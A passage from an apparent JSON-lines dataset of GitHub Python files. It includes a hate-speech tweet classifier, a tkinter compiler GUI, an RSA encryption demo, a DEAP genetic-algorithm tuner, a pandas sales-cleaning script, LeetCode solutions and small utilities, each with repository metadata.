feature_name_tfidf.append(k)\n\n\nLR_tfidf=LogisticRegression(class_weight=\"balanced\",penalty=\"l1\",C=0.01).fit(tfidf,np.reshape(target, target.shape[0]))\nselect1=SelectFromModel(LR_tfidf,prefit=True)\nx=select1.transform(tfidf)\n\n\n\n\nsave_tfidf = open(\"tfidf.pickle\", \"wb\")\npickle.dump(tfidf, save_tfidf)\nsave_tfidf.close()\nprint(\"tfidf np array has been pickled\")\n\n# fx = open(\"tfidf.pickle\", \"rb\")\n# tfidf = pickle.load(fx)\n# fx.close()\n\n\n\n\n\ntweet_tags= cleaner.preprocessing_for_pos_tags(features)\nsave_tags = open(\"tags.pickle\",\"wb\") \npickle.dump(tweet_tags , save_tags)\nsave_tags.close()\nprint(\"pickle of tweet_tags is made\")\n\n\npos_vectorizer = TfidfVectorizer(\n tokenizer=None,\n lowercase=False,\n preprocessor=None,\n ngram_range=(1, 3),\n stop_words=None,\n use_idf=False,\n smooth_idf=False,\n norm=None,\n decode_error='replace',\n max_features=5000,\n min_df=5,\n max_df=0.75,\n)\n\n\npos = pos_vectorizer.fit_transform(tweet_tags).toarray()\npos_vocab = {v:i for i, v in enumerate(pos_vectorizer.get_feature_names())}\nfeature_name_pos=[]\nfor k,v in pos_vocab.items():\n 
feature_name_pos.append(k)\n\n\nLR_pos=LogisticRegression(class_weight=\"balanced\",penalty=\"l1\",C=0.01).fit(pos,np.reshape(target, target.shape[0]))\nselect2=SelectFromModel(LR_pos,prefit=True)\ny=select2.transform(pos)\n\n\n\n\nsave_pos = open(\"pos.pickle\", 'wb')\npickle.dump(pos, save_pos)\nsave_pos.close()\nprint(\"Pos_vectorizer has been pickled\")\n\n\n\n\nsentiment_analyzer = vs()\n\n\ndef more_feats(sent):\n    text = cleaner.basic_cleaning( sent )\n    sentiment = sentiment_analyzer.polarity_scores( sent )\n    syllables = textstat.syllable_count( text )\n    avg_syl_per_word = (0.001 + float( syllables )) / float( 0.001 + len( word_tokenize( text ) ) )\n    num_terms = len( sent.split() )\n    num_words = len( text.split() )\n    num_unique_words = len( set( text.split() ) )\n    num_char = len( text )\n    total_char = len( sent )\n    sent = cleaner.preprocessing_stage2( sent )\n    urlcount = sent.count( \"URLHERE\" )\n    mention = sent.count( \"MENTIONHERE\" )\n    hashtags = sent.count( \"HASHTAGHERE\" )\n    is_retweet = (\"RT\" in text)\n    FKRA = round( float( 0.39 * float( num_words ) / 1.0 ) + float( 11.8 * avg_syl_per_word ) - 15.59, 1 )\n    FRE = round( 206.835 - 1.015 * (float( num_words ) / 1.0) - (84.6 * float( avg_syl_per_word )), 2 )\n\n    info_features = [FKRA, FRE, syllables, avg_syl_per_word, num_char, total_char, num_terms,\n                     num_words, num_unique_words, sentiment['neg'], sentiment['pos'], sentiment['neu'],\n                     sentiment['compound'],\n                     hashtags, mention, urlcount, is_retweet]\n    return info_features\n\n\ndef get_feature_array(doc):\n    feats = []\n    for t in doc:\n        feats.append( more_feats( t ) )\n    \n    return np.array( feats )\n\n\n\nextras = get_feature_array( doc2 )\nextras_f = open( \"extrafeats.pickle\", \"wb\" )\npickle.dump( extras, extras_f )\nextras_f.close()\nprint( \"Extras has been pickled\" )\n\n# extras_f = open(\"extrafeats.pickle\", 'rb')\n# extras = pickle.load(extras_f)\n# extras_f.close()\n\n\n\nM = np.concatenate([x, y, extras, target], axis=1)\n\nprint( \"shape of M: \",M.shape )\n\n\n\nnp.random.shuffle(M)\ny = np.reshape(M[:,-1],M.shape[0])\n\n\nx_train= M[:int( M.shape[0] * 0.7 ),:-1]\nx_test= M[int( M.shape[0] * 0.7 ):, :-1]\n\ny_train= y[: int(y.shape[0]*0.7)]\ny_test= y[int(y.shape[0]*0.7):]\n\n\n\n\n\nRFclassifier = RandomForestClassifier( n_estimators=90, max_features=0.65, min_samples_leaf=12, bootstrap=True, n_jobs=2 )\nRFclassifier.fit(x_train,y_train)\n#pickle RFclassifier\nsave_rfc = open(\"RF_pickle.pickle\", \"wb\")\npickle.dump(RFclassifier, save_rfc)\nsave_rfc.close()\nprint(\"RFclassifier has been pickled\")\n\ny_pred_rfc = RFclassifier.predict(x_test)\naccuracyRF= find_accuracy(y_test, y_pred_rfc)\nprecisionRF= precision_recall_fscore_support(y_test, y_pred_rfc, average='weighted')[0]\nprint(\"Accuracy of Random forest is : \", accuracyRF)\n\n\n\n\n\n\n\nsvmclassifier = LinearSVC(class_weight='balanced',C=0.01, penalty='l2', loss='squared_hinge',multi_class='ovr')\nsvmclassifier.fit( x_train, y_train)\n#pickle SVMclassifier\nsave_classifier = open(\"svm_pickle.pickle\", \"wb\")\npickle.dump(svmclassifier, save_classifier)\nsave_classifier.close()\n\ny_pred_svm = svmclassifier.predict(x_test)\naccuracySVM= find_accuracy(y_test, y_pred_svm)\nprecisionSVM= precision_recall_fscore_support(y_test, y_pred_svm, average='weighted')[0]\nprint(\"Accuracy of SVM is : \", accuracySVM)\n\n\n\n\nLRclassifier= LogisticRegression(class_weight='balanced',penalty=\"l2\",C=0.01)\nLRclassifier.fit(x_train, y_train)\n#pickle LRclassifier\nsave_classifier = 
open(\"LR_pickle.pickle\", \"wb\")\npickle.dump(LRclassifier, save_classifier)\nsave_classifier.close()\n\n\ny_pred_lr = LRclassifier.predict(x_test)\naccuracyLR= find_accuracy(y_test, y_pred_lr)\nprecisionLR= precision_recall_fscore_support(y_test, y_pred_lr, average='weighted')[0]\nprint(\"Accuracy of Logistic Regression is : \", accuracyLR)\n\n\n\n\n\n\nngram_indices=select1.get_support(indices=True)\nngram_features=[feature_name_tfidf[i] for i in ngram_indices]\nnew_vocab_tfidf={v:i for i,v in enumerate(ngram_features)}\nidf_vals_ = []\nfor i in ngram_indices:\n    idf_vals_.append(idf_vals[i])\n\n\nnew_vectorizer = TfidfVectorizer(\n    ngram_range=(1, 3),\n    stop_words=l_stop, \n    use_idf=False,\n    smooth_idf=False,\n    norm=None, \n    decode_error='replace',\n    min_df=1,\n    max_df=1.0,\n    vocabulary=new_vocab_tfidf\n    )\n\n\n\n\ntfidf_=new_vectorizer.fit(features)\n\n\n\n\n\npos_indices=select2.get_support(indices=True)\npos_features=[feature_name_pos[i] for i in pos_indices]\nnew_pos={v:i for i, v in enumerate(pos_features)}\n\n\nnew_pos_vectorizer = TfidfVectorizer(\n    ngram_range=(1, 3),\n    stop_words=None, \n    use_idf=False,\n    smooth_idf=False,\n    norm=None, \n    decode_error='replace',\n    min_df=1,\n    max_df=1.0,\n    vocabulary=new_pos\n    )\n\npos_ = new_pos_vectorizer.fit(tweet_tags)\n\n\n\n\nsent=\"give any sentence\"\nmy_classifier= voted_classifier(RFclassifier,svmclassifier,LRclassifier)\nans= my_classifier.predict_type(sent)\nprint(ans)\n\n\n\n\n\n\n","repo_name":"shrutiag95/Automated-Cyber-Hate-Detection-Through-Machine-Learning-And-Natural-Language-Processing","sub_path":"python-files/first level classification.py","file_name":"first level classification.py","file_ext":"py","file_size_in_byte":9890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38046096098","text":"from tkinter import *\nfrom tkinter import filedialog\nimport COMPILER as c, os\nfrom subprocess import Popen\n\nclass rootMenu:\n    def __init__(self,master):\n        self.frame = Frame(master)\n        self.load = Button(self.frame, text='Load File', command=self.loadFile)\n        self.save = Button(self.frame, text='Save File', command=self.saveFile)\n        self.submit = Button(self.frame, text='Compile KerbalSpace\\nto Python', command=self.compiler)\n        self.exe = Button(self.frame, text='Run in IDLE', command=self.exe)\n        self.run = Button(self.frame, text='Run in CMD', command=self.run)\n        for y in [\"frame\",\"load\",\"save\",\"submit\",\"exe\",\"run\"]:\n            exec(\"self.\"+str(y)+\".pack(fill=BOTH,expand=True)\")\n    \n    def loadFile(self):\n        self.lFile = filedialog.askopenfilename(filetypes=((\"KerbalSpace files\", \"*.ks\"),\n                                                           (\"All files\", \"*.*\")))\n    def saveFile(self):\n        self.sFile = filedialog.asksaveasfilename(filetypes=((\"Python files\", \"*.py\"),\n                                                           (\"All files\", \"*.*\")))\n    def compiler(self):\n        c.compiler(self.lFile,self.sFile)\n\n    def exe(self):\n        bat = open(self.sFile)\n        a = bat.read()\n        exec(a)\n        bat.close()\n\n    def run(self):\n        bat = open('RUNTIME.bat','w')\n        bat.write('python '+self.sFile+'\\npause\\n')\n        bat.close()\n        p = Popen(\"RUNTIME.bat\")\n        stdout, stderr = p.communicate()\n        os.remove('RUNTIME.bat')\n\ndef window(x,y,self=0):\n    exec(\"{1}=Tk()\\n{1}.wm_title('{0}')\\nmenu={1}Menu({1})\\n{1}.mainloop()\".format(str(x),str(y)))\n\nwindow('Selection Menu', 'root')\n","repo_name":"StardustGogeta/Math-Programming","sub_path":"Python/Unfinished/KerbalSpace/Converter Window.py","file_name":"Converter 
Window.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16647562962","text":"class Solution(object):\n def reorderLogFiles(self, logs):\n \"\"\"\n :type logs: List[str]\n :rtype: List[str]\n \"\"\"\n res = []\n digit = []\n letter = []\n for log in logs:\n if (log.split(\" \")[1][0]).isnumeric():\n digit.append(log)\n else:\n letter.append(log)\n \n def sortKey(l):\n return l.split(\" \")[1:]\n \n letter.sort(key = sortKey)\n return letter + digit","repo_name":"ny215/LeetcodeExercise","sub_path":"String/937. Reorder Log Files.py","file_name":"937. Reorder Log Files.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24075911964","text":"#-----------------Public Key Encryption--------------\r\n\r\nfrom Crypto.Cipher import PKCS1_OAEP\r\nfrom Crypto.PublicKey import RSA\r\nfrom binascii import hexlify\r\n\r\nfile_name='Test.txt'\r\nwith open(file_name,'w') as f:\r\n f.write(\"Public and Private key encryption\")\r\nwith open(file_name,'rb') as f:\r\n mssg=f.read()\r\n\r\nprint(mssg)\r\n# generating private key of length of 1024 bits\r\nprivate_key=RSA.generate(1024)\r\n# generating the public key from private key\r\npublic_key=private_key.publickey()\r\n\r\n# private_key and public_key are RSA Key objects .Now converting them to strings\r\nprivate_key_str= private_key.export_key().decode()\r\npublic_key_str= public_key.export_key().decode()\r\n\r\n#writing the public and private keys to .pem files\r\nwith open('private_key.pem','w') as pr:\r\n pr.write(private_key_str)\r\nwith open('public_key.pem','w') as pr:\r\n pr.write(public_key_str)\r\n\r\n# importing keys from pem files and converting to RSA key objects\r\npr_key=RSA.import_key(open('private_key.pem','r').read())\r\npu_key=RSA.import_key(open('public_key.pem','r').read())\r\n\r\n# encryption part\r\ncipher= PKCS1_OAEP.new(key=public_key)\r\ncipher_text= cipher.encrypt(mssg)\r\nprint((cipher_text))\r\n\r\n#decryption part\r\ndecrypt_cipher=PKCS1_OAEP.new(key=private_key)\r\ndecrypt_mssg=decrypt_cipher.decrypt(cipher_text)\r\nprint(decrypt_mssg)\r\n\r\n","repo_name":"nalin2002/Cryptography-Encryptions","sub_path":"ASymm_Encryption.py","file_name":"ASymm_Encryption.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43893518481","text":"\"\"\"add-shared-policy\n\nRevision ID: 2821c95ce276\nRevises: 6834e544e667\n\n\"\"\"\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '2821c95ce276'\ndown_revision = '6834e544e667'\n\n\ndef upgrade():\n op.add_column(\n 'auth_policy',\n sa.Column('shared', sa.Boolean, server_default='false', nullable=False),\n )\n\n\ndef downgrade():\n op.drop_column('auth_policy', 'shared')\n","repo_name":"wazo-platform/wazo-auth","sub_path":"wazo_auth/database/alembic/versions/2821c95ce276_add_shared_policy.py","file_name":"2821c95ce276_add_shared_policy.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"22691239933","text":"import functools\nimport math\n\ndef tongCS(n):\n res = 0\n while n > 0:\n res += n % 10\n n //= 10\n return res\n\ndef cmp(a, b):\n if tongCS(a) != tongCS(b):\n if tongCS(a) < tongCS(b):\n return -1\n return 1\n else:\n if a < 
b:\n            return -1\n        return 1\n\ndef TC():\n    n = int(input())\n    a = [int(x) for x in input().split()]\n    a = sorted(a, key = functools.cmp_to_key(cmp))\n    for i in a:\n        print(i, end = \" \")\n    print()\n\nt = 1\nt = int(input())\nfor i in range(t): TC()\n\n\n\n\n\n\n","repo_name":"nguyenvantu11052002/Python-PTIT","sub_path":"PY02023 - SẮP XẾP THEO TỔNG CHỮ SỐ.py","file_name":"PY02023 - SẮP XẾP THEO TỔNG CHỮ SỐ.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18389978263","text":"# coding:utf-8\n\"\"\"\nNeural network tuned with a genetic algorithm,\nsearching for the optimal hyperparameters\n\ncross_ration: crossover probability\nmutate_ration: probability that an individual mutates\niteration: number of generations\n\nindividual: one set of design variables\npopulation: the current generation\noffspring: the next generation\nfitness: fitness value\nselection: choosing the next generation from the current one\ncrossover: exchanging genes between two individuals\nmutation: random mutation\n\n1. initial setup\n2. evaluation\n3. selection\n4. crossover\n5. mutation\n\n\"\"\"\n\nimport random\nfrom deap import base, creator, tools\nimport matplotlib.pyplot as plt\nimport mlp\nimport test\n\n\ndef genAlg(population=5, cross_ration=0.5, mutate_ration=0.2, iteration=5):\n    \"\"\"\n    cross_ration: crossover probability\n    mutate_ration: mutation probability\n    iteration: number of iterations\n    \"\"\"\n    random.seed(64)\n    pop = toolbox.population(n=population)\n\n    print(\"start of evolution\")\n\n    # evaluate the individuals of the initial population\n    fitnesses = list(map(toolbox.evaluate, pop))\n    for ind, fit in zip(pop, fitnesses):\n        ind.fitness.values = fit\n\n    print(\" %i invalid \" % len(pop))\n\n    best_fitness = []\n    # start of the evolution loop\n    for g in range(iteration):\n        print(\" -- %i gen --\" % g)\n\n        \"\"\" selection \"\"\"\n        offspring = toolbox.select(pop, len(pop))\n        offspring = list(map(toolbox.clone, offspring))\n\n        \"\"\" crossover \"\"\"\n        for child1, child2 in zip(offspring[::2], offspring[1::2]):\n            if random.random() < cross_ration:\n                toolbox.mate(child1, child2)\n                # invalidate the fitness of the crossed individuals\n                del child1.fitness.values\n                del child2.fitness.values\n        \n        \"\"\" mutation \"\"\"\n        for mutant in offspring:\n            if random.random() < mutate_ration:\n                toolbox.mutate(mutant)\n                del mutant.fitness.values\n\n        try:\n            invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n            fitnesses = map(toolbox.evaluate, invalid_ind)\n            for ind, fit in zip(invalid_ind, fitnesses):\n                ind.fitness.values = fit\n        except AssertionError:\n            pass\n        \n        print(\" %i invalid \" % len(invalid_ind))\n\n        # next generation\n        pop[:] = offspring\n        # fitness statistics\n        try:\n            fits = [ind.fitness.values[0] for ind in pop]\n\n            length = len(pop)\n            mean = sum(fits)/length\n            sum2 = sum(x*x for x in fits)\n            std = abs(sum2 / length - mean**2)**0.5\n\n            print(\" Min %s\" % min(fits))\n            print(\" Max %s\" % max(fits))\n            print(\" Avg %s\" % mean)\n            print(\" Std %s\" % std)\n        except IndexError:\n            pass\n    \n    print(\"-- iteration end -- \")\n\n    best_ind = tools.selBest(pop, 1)[0]\n    print(\" best individual %s %s \" % (best_ind, best_ind.fitness.values))\n\n    return best_ind\n\ndef run_mlp(bounds):\n    _mlp = mlp.MLP(dense1=bounds[0],\n                   dense2=bounds[1],\n                   drop1=bounds[2],\n                   drop2=bounds[3],\n                   batch_size=bounds[4],\n                   activation=bounds[5],\n                   opt=bounds[6]\n                   )\n\n    mnist_evaluation = _mlp.mlp_evaluate()\n    \n    return mnist_evaluation[0],\n    \n\n\"\"\" define Genetic Algorithm \"\"\"\n\ncreator.create('FitnessMax', base.Fitness, weights=(-1.0,))\ncreator.create('Individual', list, fitness= creator.FitnessMax)\n\n# defining attributes for individual\ntoolbox = base.Toolbox()\n\n# define the generator function for each parameter\n# neuron size\ntoolbox.register(\"dense1\",random.choice, (32, 64, 128, 256, 512, 1024))\ntoolbox.register(\"dense2\", random.choice, (32, 64, 128, 256, 512, 1024))\n\n# dropout rate\ntoolbox.register(\"drop1\", random.uniform, 0.2, 
0.5)\ntoolbox.register(\"drop2\", random.uniform, 0.2, 0.5)\n\n# training\n# toolbox.register(\"batch_size\", random.choice, (16, 32, 64, 128, 256, 512))\ntoolbox.register(\"batch_size\", random.choice, (16, 32, 64, 128, 256, 512))\ntoolbox.register(\"activation\", random.choice, ('sigmoid','relu'))\ntoolbox.register(\"optimizer\", random.choice, ('RMSprop','SGD1','SGD2','Adam'))\n\n# register attributes to individual\ntoolbox.register('individual', tools.initCycle, creator.Individual,\n                 (toolbox.dense1, toolbox.dense2,\n                  toolbox.drop1, toolbox.drop2,\n                  toolbox.batch_size, toolbox.activation, toolbox.optimizer),\n                 n = 1)\n\n# individual to population\ntoolbox.register('population', tools.initRepeat, list, toolbox.individual)\n\n# crossover operator\ntoolbox.register('mate', tools.cxTwoPoint)\n# mutation operator\ntoolbox.register('mutate', tools.mutFlipBit, indpb = 0.05)\n# selection operator\ntoolbox.register('select', tools.selTournament, tournsize=3)\n\ntoolbox.register('evaluate', run_mlp)\n\nbest_int = genAlg(population=5, cross_ration=0.5, mutate_ration=0.2, iteration=50)\n\n\n","repo_name":"polyudsa/AI","sub_path":"mlp-ga/mlp_ga.py","file_name":"mlp_ga.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29564014907","text":"# This script copies the contents from one file to another\n\nimport sys\n\nfromfile = input(\"Enter the File from which the contents need to be copied : \")\ntofile = input(\"Enter the File to which the contents need to be copied : \")\n\n# Assign object to read the files\n\nreadfile = open(fromfile , 'r+')\ndata = readfile.read()\nreadfile.close()\n\nwritefile = open(tofile , 'w+')\nwritefile.write(data)\nwritefile.close()\n","repo_name":"darshanchandran/PythonProject","sub_path":"PythonProject/Python programming/learning/copypaste.py","file_name":"copypaste.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33845932697","text":"import time\n\n\nclass Solution:\n    def permute(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        if not nums:\n            return []\n        res = []\n\n        def dfs(nums, path):\n            if not nums:\n                res.append(path)\n                return\n\n            for i in range(len(nums)):\n                dfs(nums[:i] + nums[i + 1:], path + [nums[i]])\n\n        dfs(nums, [])\n        return res\n\n\nif __name__ == \"__main__\":\n    nums = [1, 2, 3]\n    start = time.time()\n    solution = Solution()\n    print(solution.permute(nums))\n    end = time.time()\n    print(\"runtime = \", end - start)\n","repo_name":"simplynaive/LeetCode","sub_path":"46. Permutations.py","file_name":"46. 
Permutations.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28519022540","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 22 10:20:16 2022\r\n\r\n@author: PascalDupontBrussels\r\nAnaconda Spyder\r\n\"\"\"\r\n\r\nimport pandas as pd\r\n\r\n#file_name = pd.read_csv('file.csv') <-- format of read_csv\r\n#data = pd.read_csv('transaction.csv')\r\ndata = pd.read_csv('transaction.csv', sep=';')\r\n\r\n#Summary of the data \r\ndata.info()\r\n\r\n#working with calulations\r\n#Defining variables\r\n\r\nCostPerItem = 11.73\r\nSellingPricePerItem = 21.11\r\nNumberOfItemPurchased = 6\r\n\r\n#Mathematical Operation on Tableau\r\nProfitPerItem = 21.11 - 11.73\r\nProfitPerItem = SellingPricePerItem - CostPerItem\r\n\r\nProfitBytransaction = ProfitPerItem * NumberOfItemPurchased\r\nCostPerTransaction = CostPerItem * NumberOfItemPurchased\r\nSellingPriceperTransaction = SellingPricePerItem * NumberOfItemPurchased\r\n\r\n#Costpertransaction Column calculation\r\n#CostPertransaction = CostPeritem * NumberofitemsPurchases\r\n#variable = dataframe['column_name] \r\nCostPerItem = data['CostPerItem'] \r\nNumberOfItemsPurchased = data['NumberOfItemsPurchased']\r\nCostPerTransaction = NumberOfItemsPurchased * CostPerItem\r\n\r\nSellingPricePerItem = data['SellingPricePerItem']\r\n\r\n#Adding a column to a dataframe\r\ndata['CostPerTransaction'] = CostPerTransaction\r\n\r\n#Sales per transaction\r\ndata['SalesPerTransaction'] = data['SellingPricePerItem'] * data['NumberOfItemsPurchased']\r\n\r\n#Profit Calulation = Sales - Cost\r\ndata['ProfitByTransaction'] = data['SalesPerTransaction'] - data['CostPerTransaction']\r\n\r\n#Markup = (Sales- Cost)/ cost\r\n#data['Markup'] = (data['SalesPerTransaction'] - data['CostPerTransaction']) / data['CostPerTransaction']\r\ndata['Markup'] = data['ProfitByTransaction'] / data['CostPerTransaction']\r\n\r\n#data.info()\r\n#Rouding Marking\r\n#roundmarkup = round(data['Markup'],2)\r\ndata['Markup'] = round(data['Markup'],2)\r\n\r\n#Combining data Fields\r\n\r\nmyname = 'Pascal ' + 'Dupont'\r\nmy_date = 'day' + '-' + 'month' + '-' + 'year'\r\nmy_date = data['Day'] + data['Month'] + data['Year'] #not working int+str\r\n\r\n#Checking columnsdata type\r\nprint(data['Day'].dtype) \r\n\r\n#Change Column Type\r\nday = data['Day'].astype(str)\r\nyear = data['Year'].astype(str)\r\n\r\nprint(year.dtype) \r\n\r\nmy_date = day + '-' + data['Month'] + '-' + year\r\n\r\n#Add a new column date in our data\r\ndata['date'] = my_date\r\n\r\n#Using iloc to view specific columns/rows\r\n\r\ndata.iloc[0] # views the row with index 0\r\ndata.iloc[3] # views row 3\r\ndata.iloc[0:5] # views first 5 row\r\ndata.iloc[-4:] # views the four last rows\r\ndata.head(5) # brings in first 5 rows\r\ndata.iloc[:,2] # all rows column 2\r\ndata.iloc[4,2] # row 4 column 2\r\n\r\n#Using Split to split the ClientKeywords Field\r\n#new_var = column.str.split('sep', expand = True)\r\nsplit_col = data['ClientKeywords'].str.split(',', expand = True)\r\n\r\n#Creating new columns forthe split columns in ClientKeywords\r\ndata['ClientAge'] = split_col[0]\r\ndata['ClientType'] = split_col[1]\r\ndata['LengthOfContract'] = split_col[2]\r\n\r\n#Using the replace function\r\ndata['ClientAge'] = data['ClientAge'].str.replace('[', '') \r\ndata['LengthOfContract'] = data['LengthOfContract'].str.replace(']', '') \r\n\r\ndata['ClientAge'] = data['ClientAge'].str.replace(\"'\", '')\r\ndata['ClientType'] = 
data['ClientType'].str.replace(\"'\", '') \r\ndata['LengthOfContract'] = data['LengthOfContract'].str.replace(\"'\", '')\r\n\r\n#Using the lower function itemsto lowercase\r\ndata['ItemDescription'] = data['ItemDescription'].str.lower()\r\n\r\n#How to Merge files\r\n#Bringing a new dataset\r\nseason = pd.read_csv('value_inc_seasons.csv', sep=';')\r\n\r\n#Merging files: merge_dataframe = pd.merge(old_dataframe, new_dataframe, on = 'key'. (here->Month))\r\ndata = pd.merge(data, season, on ='Month')\r\n\r\n#Dropping Columns\r\n#dataframe = dataframe.drop('columns name' , axis =1)\r\n#dataframe = dataframe.drop(['columns name1', 'columns name2', 'columns name3'] , axis =1)\r\ndata = data.drop('Year', axis = 1)\r\ndata = data.drop(['Month', 'Day', 'ClientKeywords'], axis = 1)\r\n\r\n#Export into a .csv\r\ndata.to_csv('ValueInc_Cleaned.csv', index = False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"PascalDupontBrussels/PortfolioProjects","sub_path":"Python_Tableau_Analysis/valueinc_sales.py","file_name":"valueinc_sales.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42517564731","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport mdconf_oop as md\n\ndef read_xvg_file(file_name) :\n x = []\n y = []\n with open(file_name) as f:\n for line in f:\n cols = line.split()\n if len(cols) == 2 and cols[0][0] != '@':\n x.append(float(cols[0]))\n y.append(float(cols[1]))\n return x, y\n\n# Water-vapourt surface tension\ngamma = 5.78e-2 # Pa*m\n# Avogadro's number\nN_A = 6.02214076e23 # mol^-1\n\nlabel = ['00', '01', '02', '03', '04', '05', '06']\na = np.linspace(0.0, 0.7, 8)\n\nxvg_res = []\nxvg_sol = []\ngro_init_res = []\ngro_fin_res = []\nfor l in label :\n xvg_res.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_res/dhdl.xvg')\n xvg_sol.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_sol/dhdl.xvg')\n gro_init_res.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_res/init_conf.gro')\n gro_fin_res.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_res/confout.gro')\n\nconf_init = md.Configuration()\nconf_init.input(gro_init_res[0])\nconf_fin = md.Configuration()\nconf_fin.input(gro_fin_res[0])\nLy = (conf_init.box_yy)*1e-9\nLx0 = (conf_init.box_xx)*1e-9\nLx1 = (conf_fin.box_xx)*1e-9\ndiff_H_sur = [ (2.0*N_A*gamma*Ly*(Lx1-Lx0))*1e-3, ]\n\ntheta_0 = 37.8\ndelta_F_wet_dry = -2.0*N_A*gamma*np.cos(np.deg2rad(theta_0))*Ly*Lx0*1e-3\n\nk_example = 4\n\nfor k in range(1, len(label)) :\n conf_init.input(gro_init_res[k])\n conf_fin.input(gro_fin_res[k])\n Lx0 = (conf_init.box_xx)*1e-9\n Lx1 = (conf_fin.box_xx)*1e-9\n diff_H_sur.append( (2.0*N_A*gamma*Ly*(Lx1-Lx0))*1e-3 )\n\nt, _ = read_xvg_file( xvg_res[0] )\nlam = np.array(t) / max(t)\ndl = lam[1]-lam[0]\n\nfig1, (ax1, ax2) = plt.subplots(1, 2)\n\ndiff_H_res = []\nfor k in range(len(label)) :\n _, dhdl_avg = read_xvg_file( xvg_res[k] )\n delta_h = dl*np.cumsum(dhdl_avg)\n diff_H_res.append(delta_h[-1])\n if k == k_example :\n ax1.plot(t, dhdl_avg, 'g-', linewidth=0.25)\n ax1.plot(t, np.zeros(len(t)), 'k--', linewidth=2.5)\n ax1.plot(t, delta_h, 'r-', linewidth=2.5, label=r'integral over $d\\lambda$')\n ax1.set_title('Dry', fontsize=35.0)\n ax1.set_xlabel('$t$ [ps]', fontsize=25.0)\n ax1.set_ylabel(r'$$ [kJ/mol]', fontsize=25.0)\n ax1.legend(fontsize=25.0)\n ax1.tick_params(axis='x', labelsize=20.0)\n ax1.tick_params(axis='y', labelsize=20.0)\n y_min = 
min(dhdl_avg)\n y_max = max(dhdl_avg)\n\ndiff_H_sol = []\nfor k in range(len(label)) :\n _, dhdl_avg = read_xvg_file( xvg_sol[k] )\n delta_h = dl*np.cumsum(dhdl_avg)\n diff_H_sol.append(delta_h[-1])\n if k == k_example :\n ax2.plot(t, dhdl_avg, 'c-', linewidth=0.25)\n ax2.plot(t, np.zeros(len(t)), 'k--', linewidth=2.5)\n ax2.plot(t, delta_h, 'r-', linewidth=2.5)\n ax2.set_title('Wet', fontsize=35.0)\n ax2.set_xlabel('$t$ [ps]', fontsize=25.0)\n ax2.tick_params(axis='x', labelsize=20.0)\n ax2.tick_params(axis='y', labelsize=20.0)\n y_min = min( y_min, min(dhdl_avg))\n y_max = max( y_max, max(dhdl_avg))\n ax1.set_xlim([0.0, max(t)])\n ax1.set_ylim([y_min, y_max])\n ax2.set_xlim([0.0, max(t)])\n ax2.set_ylim([y_min, y_max])\n\nplt.show()\n\ndiff_H_sol.insert(0, 0.0)\ndiff_H_res.insert(0, 0.0)\ndiff_H_sur.insert(0, 0.0)\n\ndiff_H_sol = np.array(diff_H_sol)\ndiff_H_res = np.array(diff_H_res)\ndiff_H_sur = np.array(diff_H_sur)\n\ndiff_H_ws = diff_H_sol - diff_H_res - diff_H_sur\n\nplt.plot(a, diff_H_sol, 'ko-.', linewidth=1.5, markersize=10.0, label='total')\nplt.plot(a, diff_H_res, 'gs-.', linewidth=1.5, markersize=10.0, label='pos. res.')\nplt.plot(a, diff_H_sur, 'bx-.', linewidth=1.5, markersize=10.0, label='liquid/vapour')\nplt.plot(a, diff_H_ws, 'rD-.', linewidth=3.0, markersize=15.0, label='excess')\nplt.plot([0.0, 0.75], [delta_F_wet_dry, delta_F_wet_dry], 'm--', linewidth=3.0, label=r'$\\delta$ wet-dry')\nplt.title('Free energy analysis', fontsize=35.0)\nplt.legend(fontsize=25.0)\nplt.xlim(0.0, 0.75)\nplt.xticks(fontsize=20.0)\nplt.yticks(fontsize=20.0)\nplt.ylabel('$\\Delta F$ [kJ/mol]', fontsize=25.0)\nplt.xlabel('$a=hk$ [-1]', fontsize=25.0)\nplt.show()\n","repo_name":"MicPellegrino/python_for_md","sub_path":"free_energy_analysis.py","file_name":"free_energy_analysis.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"524636388","text":"import unittest\nclass DEVISION(unittest.TestCase):\n def setUp(self):\n print('********************除法运算,开始啦*************************')\n\n\n def test_chuQ(self):\n '''除法运算7'''\n a = 10\n b = 5\n result = a / b\n ex = 2\n self.assertEqual(result, ex)\n\n def test_chuq(self):\n '''除法运算8'''\n a = 10\n b = 6\n result = a / b\n ex = 2\n self.assertEqual(result, ex)\n\n 